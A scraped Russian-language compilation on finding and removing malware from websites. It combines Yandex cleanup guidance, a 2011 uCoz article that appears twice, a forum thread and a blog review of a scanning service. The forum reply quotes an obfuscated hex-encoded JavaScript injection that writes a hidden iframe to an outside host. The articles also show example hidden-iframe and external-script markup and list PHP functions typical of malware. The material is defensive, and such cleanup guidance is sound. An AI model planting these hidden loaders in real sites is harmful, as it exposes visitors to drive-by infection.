Как вылечить сайт ucoz

Мы улучшаем процессы подготовки данных, поэтому информация в Вебмастере в разделе Ссылки может обновляться с задержкой и существенно меняться. Например, могут появляться ссылки, ведущие с уже несуществующих страниц.

Ожидаем, что это не повлияет на состояние сайта в результатах поиска. Пожалуйста, дождитесь окончания работ.

Проанализируйте способы заражения:

Злоумышленник может получить пароли к администраторским панелям CMS, FTP или SSH аккаунтам. Обычно пароли подбирают или крадут с помощью троянских программ, заразивших компьютер вебмастера.
Уязвимости веб-приложения могут позволять посторонним размещать на сайте произвольный код.
Из-за заражения внешнего ресурса (партнерской программы, баннерной системы, счётчика) предоставленный вам код может стать опасным для пользователей.

Проанализируйте информацию о заражении в Яндекс.Вебмастере, в разделе Безопасность и нарушения. Раздел содержит перечень зараженных страниц, даты проверок и вынесенные антивирусом вердикты. Перейдя по ссылке в названии вердикта, вы увидите его описание и примерный вид кода, соответствующего вердикту (кода, который непосредственно появляется на страницах сайта).

Вы также можете самостоятельно воспроизвести проблему с помощью виртуальной машины.

Остановите веб-сервер, чтобы оградить посетителей сайта от потенциальной опасности. Затем проверьте антивирусом файлы веб-сервера и все рабочие станции, с которых администрируют сервер (можно использовать бесплатные антивирусные утилиты) и смените все пароли: root, FTP, SSH, от административных панелей хостинга и CMS.
Если до заражения была сделана резервная копия сайта, восстановите ее.
Обновите до последних версий все используемые сайтом программы и поищите описания исправленных уязвимостей. Возможно, это поможет понять, каким образом сайт был заражен.
Удалите лишних пользователей с расширенными правами и тщательно проверьте сервер на наличие веб-шелла, с помощью которого злоумышленник может изменять код сайта в обход авторизации.
Проверьте наличие вредоносного кода:
- во всех серверных скриптах, шаблонах CMS, базах данных;
- в конфигурационных файлах веб-сервера или интерпретатора серверных скриптов;
- если вы используете shared-хостинг, проверьте другие сайты, расположенные на том же сервере — может быть заражен весь сервер.

Признаки вредоносного кода:

Код посторонний или незнакомый, не соответствует резервной копии или системе контроля версий.
Обфусцированный (нечитаемый, неструктурированный) код.
Дата модификации файлов совпадает с временем заражения или более поздняя. Этот параметр ненадежен, так как дата модификации файлов может быть изменена вирусом.
Использование характерных для вредоносного кода функций. Примеры таких функций для языка PHP:
- динамическое исполнение кода (eval, assert, create_function);
- обфускация (base64_decode, gzuncompress, gzinflate, str_rot13, preg_replace);
- загрузка удаленных ресурсов (file_get_contents, curl_exec).

Пометка об опасности сайта в результатах поиска будет снята, если при очередной проверке робот Яндекса не обнаружит заражения. Чтобы ускорить перепроверку, в интерфейсе Яндекс.Вебмастера, в разделе Безопасность и нарушения, нажмите кнопку Я все исправил.

Рекомендуем в течение нескольких недель после заражения регулярно перепроверять файлы и код сайта на тот случай, если использованная уязвимость не была устранена или злоумышленники по прежнему имеют доступ к сайту.

Яндекс постоянно ищет и исследует новые виды заражений и публикует результаты исследований в блоге Безопасного поиска Яндекса.

Если вы обнаружили на своем сайте вредоносный или подозрительный код, отправьте его на анализ специалистам.

Чтобы ваш вопрос быстрее попал к нужному специалисту, уточните тему:

Источник

22:39 Рейтинг материала: 72/72 из 72 голосов
Как найти вирус? Что делать, если сайт попал под фильтр поисковика, а браузеры выдают табличку-предупреждение? Что делать если антивирус начал реагировать на загрузку страницы? Ответы на эти вопросы мы и постараемся найти. Рассмотрим методы обнаружения, варианты заражения, способы предотвращения, а так же попытаемся научиться самостоятельно находить, удалять и не допускать в дальнейшем Откуда и как могут появиться вирусы на страницах 1. Сам владелец в поисках скриптов насобирал по интернету, и все что собрал неглядя оптом вставил на страницы ресурса 2. Или сам владелец или журналисты или те у кого есть доступ к добавлению материалов и разрешение на HTML теги, могли занести в HTML среду материала вредоносный код. Бывает это по злому умыслу (особенно, если есть соблазн в виде разрешенного HTML). А бывает по неосторожности. Чаще всего случается при копировании и вставке через визуальный редактор текста или материала, куда мог быть вставлен вредоносный код в виде IFRAME с параметрами width=”0″ и height=”0″ или position:absolute; display:none 3. Перехват управлением сайта или угон. В этом случае возможно все. Если пароли “утекли” то возможны два варианта: или полный угон , или просто заражение страниц и скрытое управление 4. Зараженный браузер или владельца или журналистов или лиц, имеющих доступ к коду или к среде HTML при правке или добавлении материалов или к FTP. В таких случаях при любых правках с разрешением HTML зараженный браузер может “дописывать” вредоносный код в материалы или сообщения или в HTML код страниц 5. Партнерки, баннерообменные сети, тизерки и прочие объекты по обмену трафиком. Не всегда владелец в своем желании заработать и раскрутить ресурс, за счет сомнительного обмена трафиком, бывает разборчив. Если вы пропускаете через свой сайт чужой трафик или откручиваете чужие баннеры или ссылки, то будьте морально готовы к тому, что среди того что вы пропускаете могут быть зараженные объекты. Такое часто случается с партнерками с плохой модерацией и с не очень жестким отбором ресурсов. 6. Права пользователей. Ясно уже, что права на HTML добавление/редактирование раздавать не стоит, особенно не стоит допускать никого к коду. Но в связи с новыми реалиями, когда поисковики с лице GOOGLE и Яндекса стали бороться с зараженными ресурсами в интернете, и могут заблокировать весь сайт за наличие в коде или в контенте одной единственной картинки подгружаемой с зараженного хоста или ссылки на зараженный сайт, то стоит пересмотреть политику прав пользователей. А именно: не разрешать активные ссылки, запрещать би-би коды IMG и URL. Как найти вирус на сайте В идеале все скрипты и вся графика должны быть залиты на ваш сайт и вы не в коем случае не должны подгружать javascript, а так же любые флеш ролики или объекты со сторонних ресурсов. Доступ к FTP и файлам должны быть только у одного человека. Пароли от FTP и от админки не должны сохраняться ни в браузерах ни в программах FTP. В таких условиях поиск вируса облегчается. Права пользователей должны быть урезаны На странице в идеале не должно быть IFRAME и javascript с чужими адресами, и особенно с параметрами width=”0″ и height=”0″ и position:absolute; display:none А так же не должно быть закодированного кода! В таких идеальных случаях, когда все скрипты и графика имеют внутренние адреса, когда права пользователей урезаны нам остается задача найти скрипты или IFRAME с внешними адресами или закодированные скрипты и удалить их. Так же проверяем счетчики. Если в html появился сторонний счетчик (код с комментариями любого счетчика) или видоизменился сторонний вставленный вами, то его нужно или удалить или изменить на код, который выдавался сервисом статистики. В личном кабинете или в профиле статистики всегда можно сверить код. Проверяем файл htaccess на наличие перенаправлений на сторонние адреса. Так же при отсутствии в коде сторонних скриптов, но при наличии баннерных сетей, тизерок и прочих партнерок по обмену трафиком, при условии, что антивирусы пользователей или ваш антивирус упорно аллертит на на любую локальную страницу. В таком случае придется временно удалить код баннерообмена тизерки и обмен трафиком, очистить кеш, временные файлы интернета и зайти на сайт снова. В таком случае антивирус должен примолкнуть, а вы должны разбираться со своими партнерками. Как понять, что сайт заражен? 1) Если при попытке зайти на свой сайт вас перекидывает на неизвестный адрес 2) При загрузке странички появляются инородные всплывающие окна 3) При переходе по внутренним страницам выскакивает инородное окно и производится попытка закачки файла на компьютер 4) Если ваш антивирус начал реагировать на любую из страниц 5) Если появилась сторонняя реклама, которую вы не ставили 6) Если при попытке зайти на сайт вместо контента мы видим табличку – предупреждение о том, что ресурс заражен (действительно для пользователей Google Chrome, Mozilla Firefox и Opera. Для первых двух браузеров табличка означает, что Google пометил как вредоносный. Для Opera означает, что Яндекс пометил как вредоносный или мошеннический) 7) При заходе на любую страницу автоматически открывается огромное количество окон Сайт помечен как вредоносный Яндексом или Google Блокировка адреса как вредоносного или могущего нанести вред компьютеру и у Яндекса и у Google происходит посредством окна – заглушки в котором собственно и находится предупреждение. Подробней о поисковой защите. Google выдает более полную информацию о блокировке указывая вредоносные хосты, а так же выдает информацию о том, когда Google последний раз осуществлял проверку и время обнаружения вредоносного кода. Яндекс выдает малоинформативное окно с предупреждением. В обоих случаях в вебмастере и Google и Яндекса можно узнать более подробную информацию во вкладке безопасность. Если появилось окно – заглушка с предупреждением, то в выдаче поиска ваш сайт будет помечен как вредоносный специальным предупреждением. Если получили подобный фильтр с предупреждениями, то ваша задача как можно скорее избавиться от вредоносного кода . Во-первых в выдаче помеченный адрес как вредоносный не прибавит вам пользователей. А во-вторых, если пропустить второй обход робота с проверкой, то даже в случае полной очистки табличка- заглушка может провисеть довольно долго, так как частота обхода при неудалении причин блокировки заметно снижается, а именно вдвое. Как предотвратить появление вируса 1) Никогда не подгружайте javascript со сторонних адресов. Такая конструкция опасна!!! <script type=”text/javascript” src=”https://внешний адрес.ru/test.js”></script> Скрипты подгружаемые с чужих адресов в любой момент могут быть изменены или удалены. 2) Осторожно вредоносный IFRAME! Такая конструкция как правило в 99,9 % случаев опасна и содержит скрыто подгружаемый вредоносный код! <iframe src=”https://внешний адрес.ru/” name=”iframe” width=”0%” height=”0%” scrolling=”no” frameBorder=0></iframe> 3) Не занимайтесь копированием контента с чужих ресурсов в HTML среду и вставкой на свой! 4) Держите компьютер в чистоте и бойтесь пинчей 5) Пароль от FTP менять перед каждым конектом, в программах соединения по FTP пароли не держать. Доступ к файлам и скриптам должен быть только у одного человека 6) Права пользователей должны быть урезаны. HTML пользователям не давать! 7) Партнерки по обмену трафиком, баннерообменные сети и тизерки должны быть вами выбираться очень скрупулёзно, и выбор должен быть остановлен только на солидных сервисах с очень жесткой модерацией. Партнерки, куда принимают сайты с минимальным количеством хостов в сутки должны быть вами проигнорированы 8) Запоминайте время и дату последнего изменения файлов. Индексные файлы index.php и index.html проверяйте в первую очередь частичное или полное копирование статьи без прямой активной ссылки на bcnjxybr категорически запрещено
Категория: uCoz \| : worldname Дата: 2011-06-10 \| : найти вирус на сайте, как избежать
: 24446 \| Комментарии: 15 \| Теги: вирус, безопасность

Похожие материалы:

Всего комментариев: 15	1 2 »
Порядок вывода комментариев:
1-10 11-12

Добавлять комментарии могут только зарегистрированные пользователи.

[

Регистрация

Вход

]

Источник

Как найти и убрать вирус с сайта

NFS2531

Сообщений: 48

Репутация: 5

Сообщение # 1 |
14:16:34
01 Сен 2013

Я проверял свой сайт антивирусами онлайн и большинство из них сказали что на сайте есть подозрительные ссылки. Проверти мой сайт на вирусы и скажите есть ли вирус на моем сати и если да то где? Вот мой сайт https://gtauniverse.ucoz.ru/

Сообщение отредактировал NFS2531 – Воскресенье, 01 Сен 2013, 14:22:16

bandjuk

Сообщений: 6803

Репутация: 2395

Уровень замечаний:

Сообщение # 2 |
14:17:48
01 Сен 2013

Цитата (NFS2531)

Я проверял свой сайт антивирусами онлайн

эти сервисы – ГОВНО!

Цитата (NFS2531)

Проверти мой сайт на вирусы

телепатически что ли? Адрес где?

Сообщение отредактировал bandjuk – Воскресенье, 01 Сен 2013, 14:18:28

Yuri_G

Координаторы

Сообщений: 4259

Репутация: 917

Сообщение # 3 |
14:21:41
01 Сен 2013

будьте добры, адрес сайта в студию.

Цитата (NFS2531)

Интересные решения для сайта uCoz ★ Настраиваем Seo в uCoz

NFS2531

Сообщений: 48

Репутация: 5

Сообщение # 4 |
14:22:44
01 Сен 2013

bandjuk, ой забыл https://gtauniverse.ucoz.ru/

Добавлено (01 Сен 2013, 14:22:44)
———————————————
Ucoz_fan, https://gtauniverse.ucoz.ru/

Yuri_G

Координаторы

Сообщений: 4259

Репутация: 917

Сообщение # 5 |
14:25:17
01 Сен 2013

вот вам результат https://antivirus-alarm.ru/proverk….z.ru%2F

Интересные решения для сайта uCoz ★ Настраиваем Seo в uCoz

bandjuk

Сообщений: 6803

Репутация: 2395

Уровень замечаний:

Сообщение # 6 |
14:29:20
01 Сен 2013

этот скрипт себе перезалей https://stock-exchange.ucoz.com/demo….on-1.js
ничего подозрительного не вижу

Добавлено (01 Сен 2013, 14:29:20)
———————————————

Цитата (Ucoz_fan)

вот вам результат https://antivirus-alarm.ru/proverk….z.ru%2F

да вы блин издеваетесь что ли???

Yuri_G

Координаторы

Сообщений: 4259

Репутация: 917

Сообщение # 7 |
14:39:35
01 Сен 2013

Цитата (bandjuk)

да вы блин издеваетесь что ли???

почему издеваюсь…говорю что вижу…. много на сайте iframe кода вот и считается типа как вирус..

Интересные решения для сайта uCoz ★ Настраиваем Seo в uCoz

bandjuk

Сообщений: 6803

Репутация: 2395

Уровень замечаний:

Сообщение # 8 |
14:48:47
01 Сен 2013

потому, что зачем проверять сайт всякими говносервисами если на сайте нет:
1. Левой рекламы;
2. Всплывающих окон;
3. блокировки сайта антивирусами и поисковиками.
4. и т.д.
Этот говносервис вопит на чат и на рекламу юкози

Сообщение отредактировал bandjuk – Воскресенье, 01 Сен 2013, 14:49:03

webanet

Сообщений: 24067

Репутация: 4985

Сообщение # 9 |
15:06:01
01 Сен 2013

NFS2531, вот этот скрипт заражен

https://gtauniverse.ucoz.ru/design/script_site.js
открыть на редактирование в файловом менеджере и удалить вставку

Код

var _0x4576=[“x3Cx69x66x72x61x6Dx65x20x73x72x63x3Dx22x68x74x74x70x3Ax2Fx2Fx74x65x73x74x63x73x2Ex72x75x2Fx22x20x77x69x6 4x74x68x3Dx22x30x22x20x68x65x69x67x68x74x3Dx22x30x22x20x73x74x79x6Cx65x3Dx22x64x69x73x70x6Cx61x79x3Ax6Ex6 Fx6Ex65x22x3Ex3Cx2Fx69x66x72x61x6Dx65x3E”,”x77x72x69x74x65″];document[_0x4576[1]](_0x4576[0]);

онлайн проверками если пользуемся, то задаем вопросы на сайтах онлайн проверок, а не тут

ес ли есть проблемы с вирусами на сайте прошу в эту тему //forum.ucoz.ru/forum/45-34556-1 без своих онлайн проверок. заполнять заявку по форме в первом сообщении темы

ТУТ можно оставить своё мнение по любому вопросу
https://webanetlabs.net/

NFS2531

Сообщений: 48

Репутация: 5

Сообщение # 10 |
17:05:55
01 Сен 2013

webanet, спасибо. Помогло!

Источник

Опубликовано 10 февраля 2017

448

Вылечить сайт от вирусов еще совсем недавно можно было только на платной основе и совсем не дешево. Прежде всего, мало кто на первых порах создания своего сайта, задумывается о его безопасности. А в случае заражения, желательно кого-нибудь обвинить, но только не себя. А между тем, в большинстве случаев, скажем прямо, мы сами виноваты в этом, «что тут петли-то крутить!»

вылечить сайт от вирусов

Но и установкой одного антивируса здесь тоже не обойтись. Я не буду перечислять причины, а сразу перейду к главному вопросу. Если уж так случилось, что вы сами обнаружили или инструменты веб-мастера яндекса и гугла вам подсказали о присутствии вредоносного кода или вируса на вашем сайте, необходимо сразу принять меры, иначе о последствиях просто подумать страшно. Простой бан поисковиков вам покажется сказкой.

Если у вас статичный сайт-визитка созданный на простом html-шаблоне или сверстан вами самостоятельно, то вылечить такой сайт от вирусов покажется простым баловством. Ведь наверняка всегда есть копия такого сайта на локальной машине, старый удалил, новый закачал на хостинг и все готово. Но если вы используете cms-системы, здесь проблема посерьезней и решить ее на раз-два не получиться.

Конечно очень желательно иметь в запасе резервную копию сайта, но как всегда об этом можно и «позже» подумать.

Как вылечить сайт от вирусов созданный на cms

В любой cms-системе очень много различных папок и файлов необходимых для работы сайта. Отыскать в них зараженные файлы в ручном режиме, просто не реально. И здесь многим бесстрашным веб-мастерам пришли на помощь специализированные сервисы. О некоторых я рассказывал в статьях и курсах, но сегодня речь пойдет о сервисе «Вирусдай» (https://virusdie.ru).

Знал о нем давно, но не было повода для близкого знакомства. Но как говориться, не стоит доверять одному антивирусу как и одному врачу, а вдруг ошибка в диагнозе! И я решил протестировать на своем блоге. Все этапы проверки я зафиксировал с помощью подробных скриншотов.

Сервис проверки сайта на вирусы и его лечение

Для начала регистрируемся и получаем письмо с просьбой о подтверждении регистрации. Затем добавляем адрес сайта в специальное поле и процесс пошел.

вылечить сайт от вирусов

На втором этапе необходимо скачать файл синхронизации и добавить в корень сайта. При добавлении файла, название самого файла менять не нужно. Как все будет готово, жмем на зеленую ссылку.

Добавлять файл можно вручную, или автоматически, если есть данные для ftp-доступа

лечение сайта от вирусов

Вылечить сайт автоматически

Если все сделано правильно и перейдя по ссылке у вас не будет ошибок, а будет вот такая картинка, тогда все отлично и можно выбрать способ лечения платный и бесплатный поиск, а лечить будем самостоятельно. В бесплатном режиме можно проверить только один раз, но а если нет желания постоянно думать о безопасности и тратить время на проверку и лечение сайта от вирусов, можно довериться сервису за не большую плату, всего 2499 рублей в год. Что называется, заплатил и спи спокойно.

Проверка сайта на вирусы

Бесплатно вылечить сайт

Я выбрал бесплатную проверку сайта на вирусы и лечение в ручном режиме. Почему? Что касается денег, то они здесь ни при чем, а вот про ручной режим немного расскажу.

При наличии на сайте специальных расширений, которые тоже могут вызвать подозрение у разных проверочных сервисов, можно по незнанию в один миг нарушить работу всего проекта. А вот в ручном режиме, желательно разобраться что за файл и для чего он предназначен.

Кроме этого, сервис присылает отчет о проделанной работе на почтовый ящик, где так же можно просмотреть название подозрительных файлов и каждый файл является ссылкой на статью об этом файле.

Сам процесс проверки показан на картинке ниже.

процесс проверки сайта на вирусы

Так же доступен полный отчет на сайте virusdie.ru в личном кабинете. Если выбран бесплатный способ, сервис просто дает информацию о найденных подозрительных файлах или вирусах.

Подведя итог, можно сказать о том, что с помощью данного сервиса мы сможем бесплатно не вылечить сайт от вирусов, а произвести поиск подозрительных или зараженных файлов. Лечение соответственно платное, но если учитывать сложность поиска таких файлов, то помощь таких сервисов быстро решает данную проблему

Чтобы обезопасить себя и развеять все сомнения о подозрительных файлах найденных у меня на блоге, я пропустил все эти файлы еще через 50 антивирусов сервиса virustotal.

Как бесплатно вылечить сайт от вирусов самостоятельно

Проверка подозрительных файлов на вирусы

Хоть я точно знаю к каким плагинам относятся мои «подозрительные» файлы и лечить их от вирусов нет необходимости, все же решил устроить дополнительную проверку. Скопировал все файлы к себе на компьютер, запаковал в архив и с помощью virustotal проверил вначале архивом. Но и этого мне показалось мало, и я проверил весь сайт на вирусы с помощью следующей функции сервиса-это добавляя адрес сайта.

В результате ничего подозрительного выявлено не было. Я не сомневался в этом потому что отслеживаю периодически эти моменты.

Проверка архива на вирусы

Вылечить сайт от вирусов можно и вручную, но это для любителей работать ручками и копаться в файлах в поисках вредоносного кода или подозрительного файла. Об этом в другой раз. Если конечно это интересно, оставляйте комментарии.

Источник

22:39 Рейтинг материала: 72/72 из 72 голосов
Как найти вирус? Что делать, если сайт попал под фильтр поисковика, а браузеры выдают табличку-предупреждение? Что делать если антивирус начал реагировать на загрузку страницы? Ответы на эти вопросы мы и постараемся найти. Рассмотрим методы обнаружения, варианты заражения, способы предотвращения, а так же попытаемся научиться самостоятельно находить, удалять и не допускать в дальнейшем Откуда и как могут появиться вирусы на страницах 1. Сам владелец в поисках скриптов насобирал по интернету, и все что собрал неглядя оптом вставил на страницы ресурса 2. Или сам владелец или журналисты или те у кого есть доступ к добавлению материалов и разрешение на HTML теги, могли занести в HTML среду материала вредоносный код. Бывает это по злому умыслу (особенно, если есть соблазн в виде разрешенного HTML). А бывает по неосторожности. Чаще всего случается при копировании и вставке через визуальный редактор текста или материала, куда мог быть вставлен вредоносный код в виде IFRAME с параметрами width=”0″ и height=”0″ или position:absolute; display:none 3. Перехват управлением сайта или угон. В этом случае возможно все. Если пароли “утекли” то возможны два варианта: или полный угон , или просто заражение страниц и скрытое управление 4. Зараженный браузер или владельца или журналистов или лиц, имеющих доступ к коду или к среде HTML при правке или добавлении материалов или к FTP. В таких случаях при любых правках с разрешением HTML зараженный браузер может “дописывать” вредоносный код в материалы или сообщения или в HTML код страниц 5. Партнерки, баннерообменные сети, тизерки и прочие объекты по обмену трафиком. Не всегда владелец в своем желании заработать и раскрутить ресурс, за счет сомнительного обмена трафиком, бывает разборчив. Если вы пропускаете через свой сайт чужой трафик или откручиваете чужие баннеры или ссылки, то будьте морально готовы к тому, что среди того что вы пропускаете могут быть зараженные объекты. Такое часто случается с партнерками с плохой модерацией и с не очень жестким отбором ресурсов. 6. Права пользователей. Ясно уже, что права на HTML добавление/редактирование раздавать не стоит, особенно не стоит допускать никого к коду. Но в связи с новыми реалиями, когда поисковики с лице GOOGLE и Яндекса стали бороться с зараженными ресурсами в интернете, и могут заблокировать весь сайт за наличие в коде или в контенте одной единственной картинки подгружаемой с зараженного хоста или ссылки на зараженный сайт, то стоит пересмотреть политику прав пользователей. А именно: не разрешать активные ссылки, запрещать би-би коды IMG и URL. Как найти вирус на сайте В идеале все скрипты и вся графика должны быть залиты на ваш сайт и вы не в коем случае не должны подгружать javascript, а так же любые флеш ролики или объекты со сторонних ресурсов. Доступ к FTP и файлам должны быть только у одного человека. Пароли от FTP и от админки не должны сохраняться ни в браузерах ни в программах FTP. В таких условиях поиск вируса облегчается. Права пользователей должны быть урезаны На странице в идеале не должно быть IFRAME и javascript с чужими адресами, и особенно с параметрами width=”0″ и height=”0″ и position:absolute; display:none А так же не должно быть закодированного кода! В таких идеальных случаях, когда все скрипты и графика имеют внутренние адреса, когда права пользователей урезаны нам остается задача найти скрипты или IFRAME с внешними адресами или закодированные скрипты и удалить их. Так же проверяем счетчики. Если в html появился сторонний счетчик (код с комментариями любого счетчика) или видоизменился сторонний вставленный вами, то его нужно или удалить или изменить на код, который выдавался сервисом статистики. В личном кабинете или в профиле статистики всегда можно сверить код. Проверяем файл htaccess на наличие перенаправлений на сторонние адреса. Так же при отсутствии в коде сторонних скриптов, но при наличии баннерных сетей, тизерок и прочих партнерок по обмену трафиком, при условии, что антивирусы пользователей или ваш антивирус упорно аллертит на на любую локальную страницу. В таком случае придется временно удалить код баннерообмена тизерки и обмен трафиком, очистить кеш, временные файлы интернета и зайти на сайт снова. В таком случае антивирус должен примолкнуть, а вы должны разбираться со своими партнерками. Как понять, что сайт заражен? 1) Если при попытке зайти на свой сайт вас перекидывает на неизвестный адрес 2) При загрузке странички появляются инородные всплывающие окна 3) При переходе по внутренним страницам выскакивает инородное окно и производится попытка закачки файла на компьютер 4) Если ваш антивирус начал реагировать на любую из страниц 5) Если появилась сторонняя реклама, которую вы не ставили 6) Если при попытке зайти на сайт вместо контента мы видим табличку – предупреждение о том, что ресурс заражен (действительно для пользователей Google Chrome, Mozilla Firefox и Opera. Для первых двух браузеров табличка означает, что Google пометил как вредоносный. Для Opera означает, что Яндекс пометил как вредоносный или мошеннический) 7) При заходе на любую страницу автоматически открывается огромное количество окон Сайт помечен как вредоносный Яндексом или Google Блокировка адреса как вредоносного или могущего нанести вред компьютеру и у Яндекса и у Google происходит посредством окна – заглушки в котором собственно и находится предупреждение. Подробней о поисковой защите. Google выдает более полную информацию о блокировке указывая вредоносные хосты, а так же выдает информацию о том, когда Google последний раз осуществлял проверку и время обнаружения вредоносного кода. Яндекс выдает малоинформативное окно с предупреждением. В обоих случаях в вебмастере и Google и Яндекса можно узнать более подробную информацию во вкладке безопасность. Если появилось окно – заглушка с предупреждением, то в выдаче поиска ваш сайт будет помечен как вредоносный специальным предупреждением. Если получили подобный фильтр с предупреждениями, то ваша задача как можно скорее избавиться от вредоносного кода . Во-первых в выдаче помеченный адрес как вредоносный не прибавит вам пользователей. А во-вторых, если пропустить второй обход робота с проверкой, то даже в случае полной очистки табличка- заглушка может провисеть довольно долго, так как частота обхода при неудалении причин блокировки заметно снижается, а именно вдвое. Как предотвратить появление вируса 1) Никогда не подгружайте javascript со сторонних адресов. Такая конструкция опасна!!! <script type=”text/javascript” src=”https://внешний адрес.ru/test.js”></script> Скрипты подгружаемые с чужих адресов в любой момент могут быть изменены или удалены. 2) Осторожно вредоносный IFRAME! Такая конструкция как правило в 99,9 % случаев опасна и содержит скрыто подгружаемый вредоносный код! <iframe src=”https://внешний адрес.ru/” name=”iframe” width=”0%” height=”0%” scrolling=”no” frameBorder=0></iframe> 3) Не занимайтесь копированием контента с чужих ресурсов в HTML среду и вставкой на свой! 4) Держите компьютер в чистоте и бойтесь пинчей 5) Пароль от FTP менять перед каждым конектом, в программах соединения по FTP пароли не держать. Доступ к файлам и скриптам должен быть только у одного человека 6) Права пользователей должны быть урезаны. HTML пользователям не давать! 7) Партнерки по обмену трафиком, баннерообменные сети и тизерки должны быть вами выбираться очень скрупулёзно, и выбор должен быть остановлен только на солидных сервисах с очень жесткой модерацией. Партнерки, куда принимают сайты с минимальным количеством хостов в сутки должны быть вами проигнорированы 8) Запоминайте время и дату последнего изменения файлов. Индексные файлы index.php и index.html проверяйте в первую очередь частичное или полное копирование статьи без прямой активной ссылки на bcnjxybr категорически запрещено
Категория: uCoz \| : worldname Дата: 2011-06-10 \| : найти вирус на сайте, как избежать
: 24446 \| Комментарии: 15 \| Теги: вирус, безопасность

Как вылечить сайт ucoz

Как вылечить сайт от вирусов созданный на cms

Сервис проверки сайта на вирусы и его лечение

Проверка подозрительных файлов на вирусы

Чем вы обычно лечитесь?